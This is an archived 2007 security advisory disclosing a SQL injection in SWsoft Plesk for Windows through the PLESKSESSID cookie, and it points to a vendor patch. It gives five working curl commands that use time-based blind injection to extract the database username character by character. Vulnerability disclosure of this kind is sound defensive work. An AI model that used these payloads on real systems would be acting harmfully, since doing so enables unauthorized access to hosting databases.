RE: ScanAlert Security Advisory

2007-09-13T00:00:00

Description

HackerSafe Labs - Security Advisory http://www.hackersafelabs.com SWsoft Plesk for Windows - SQL Injection Vulnerability Date: 9-11-07 Vendor: www.swsoft.com Package: Plesk for Windows Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0 Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3 Credit: Nick I Merritt Risk: Related Exploit Range: Remote Attack Complexity: Medium Level of Authentication Needed: Not Required Confidentiality Impact: Major Integrity Impact: Major Availability Impact: Major Overview: SWsoft Plesk is a comprehensive control panel solution used by leading hosting providers worldwide for shared, virtual and dedicated hosting. Vulnerability: A SQL injection vulnerability exists in the Plesk application. Please see the following: SQL Injection Page 1: "login.php3" SQL Injection Page 2: "auth.php3" SQL Injection Cookie Parameter: "PLESKSESSID" Example: (Will extract the database user) 1) Delay=5224.3877 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" 2) Delay=5165.3031 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" 3) Delay=5158.9512 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" 4) Delay=5224.0980 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" 5) Delay=5241.5251 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*" Solution: Apply the following patches - http://kb.swsoft.com/en/2159

{"id": "SECURITYVULNS:DOC:17986", "bulletinFamily": "software", "title": "RE: ScanAlert Security Advisory", "description": "HackerSafe Labs - Security Advisory\r\nhttp://www.hackersafelabs.com\r\n \r\nSWsoft Plesk for Windows - SQL Injection Vulnerability\r\n\r\nDate: 9-11-07\r\nVendor: www.swsoft.com\r\nPackage: Plesk for Windows\r\nVersions: v7.6.1, v8.1.0, v8.1.1, v8.2.0\r\nVendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3\r\nCredit: Nick I Merritt\r\n\r\nRisk:\r\nRelated Exploit Range: Remote\r\nAttack Complexity: Medium\r\nLevel of Authentication Needed: Not Required \r\nConfidentiality Impact: Major\r\nIntegrity Impact: Major\r\nAvailability Impact: Major\r\n\r\nOverview:\r\nSWsoft Plesk is a comprehensive control panel solution used by leading\r\nhosting providers worldwide for shared, virtual and dedicated hosting. \r\n\r\nVulnerability:\r\nA SQL injection vulnerability exists in the Plesk application. Please\r\nsee the following:\r\n\r\nSQL Injection Page 1: "login.php3"\r\nSQL Injection Page 2: "auth.php3"\r\nSQL Injection Cookie Parameter: "PLESKSESSID"\r\n\r\nExample: (Will extract the database user)\r\n\r\n1) Delay=5224.3877 \r\nCurl.exe -k "https://www.???.com:8443/login.php3" --cookie\r\n"PLESKSESSID=1' union select if\r\n(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3\r\nfrom mysql.user/*"\r\n\r\n2) Delay=5165.3031 \r\nCurl.exe -k "https://www.???.com:8443/login.php3" --cookie\r\n"PLESKSESSID=1' union select if\r\n(substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3\r\nfrom mysql.user/*"\r\n\r\n3) Delay=5158.9512 \r\nCurl.exe -k "https://www.???.com:8443/login.php3" --cookie\r\n"PLESKSESSID=1' union select if\r\n(substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3\r\nfrom mysql.user/*"\r\n\r\n4) Delay=5224.0980 \r\nCurl.exe -k "https://www.???.com:8443/login.php3" --cookie\r\n"PLESKSESSID=1' union select if\r\n(substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3\r\nfrom mysql.user/*"\r\n\r\n5) Delay=5241.5251 \r\nCurl.exe -k "https://www.???.com:8443/login.php3" --cookie\r\n"PLESKSESSID=1' union select if\r\n(substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3\r\nfrom mysql.user/*"\r\n \r\nSolution: Apply the following patches - http://kb.swsoft.com/en/2159", "published": "2007-09-13T00:00:00", "modified": "2007-09-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17986", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:23", "edition": 1, "viewCount": 203, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8141"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8141"]}]}, "exploitation": null, "vulnersScore": 0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645537713, "score": 1659803227}, "_internal": {"score_hash": "844758ff4c15bb123d8719011d2f57c2"}}